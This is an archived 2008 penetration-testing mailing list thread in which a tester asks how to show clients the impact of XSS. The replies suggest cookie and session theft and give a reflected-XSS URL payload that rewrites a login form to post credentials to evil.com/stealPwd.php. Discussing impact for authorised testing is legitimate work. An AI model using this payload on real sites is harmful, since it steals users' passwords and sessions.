Re: Exploiting XSS



I like to change the form action...

For instance, http://www.site.com/index.php?msg=<form name=test
action=http://www.evil.com/stealPwd.php>
</form><script>document.ValidForm.action=document.test.action;</script>

When the user put username and password on ValidForm on real site, the
post will be send to www.evil.com/stealPwd.php ...
This is only for demonstration the failure, ajax is more Elegant
because they don't show the evil site...

[]'z
Danilo Nascimento


On Wed, Dec 3, 2008 at 6:01 PM, Baykal, Adnan (CSCIC)
<adnan.baykal@xxxxxxxxxxxxxxxxx> wrote:
One thing quick is to use the XSS to steal visitor cookies and
sessionids then do session hijacking. Or use jitko to scan internal
systems. Also grossman described this approach recently.



--------------------------------------------------------

This message may contain confidential information and is intended only for the individual(s) named. If you are not an intended recipient you are not authorized to disseminate, distribute or copy this e-mail. Please notify the sender immediately if you have received this e-mail by mistake and delete this e-mail from your system.
-----Original Message-----

From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of Whitehat
Sent: Wednesday, December 03, 2008 12:09 AM
To: pen-test
Subject: Exploiting XSS

Dear List,

I'm doing a WAPT for a website and found many XSS issues (both Stored
and Reflected).
I wanted to do more and show to the customer, apart from normal script
injection and getting it popped up.

Consider that u found an XSS issue in a field and your script is
running,

1. Now what are the further steps for exploiting XSS completely????
2. How an attacker can really make use of it?
3. How to Compromise ??
4. What are the real world scenarios can be used

Looking for few good inputs/imlementations/expolits/BooKs ..............

Thanks in advance,

Cheers,
White hat


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------



Relevant Pages

  • Re: Exploiting XSS
    ... You also can do phishing by preparing your faked page identical to the ... Now what are the further steps for exploiting XSS completely???? ... Security Trends Report from Cenzic ... Stay Ahead of the Hacker Curve! ...
    (Pen-Test)
  • Re: hash-injection/pass-the-hash countermeasure
    ... Multi factor auth wouldn't fix this in most environments. ... factor part is great for the 1st part of authentication, ... Security Trends Report from Cenzic ... Stay Ahead of the Hacker Curve! ...
    (Pen-Test)
  • Re: Port 4662 exploitation
    ... if it is indeed emule/edonkey and nmap returns a version number, ... bunch of open ports. ... Security Trends Report from Cenzic ... Stay Ahead of the Hacker Curve! ...
    (Pen-Test)
  • RE: discovering all websites running on a server
    ... discovering all websites running on a server ... or if there are other sites running on the IIS ... Security Trends Report from Cenzic ... Stay Ahead of the Hacker Curve! ...
    (Pen-Test)
  • Re: discovering all websites running on a server
    ... Meenal A. Mukadam ... or if there are other sites running on the IIS ... Security Trends Report from Cenzic ... Stay Ahead of the Hacker Curve! ...
    (Pen-Test)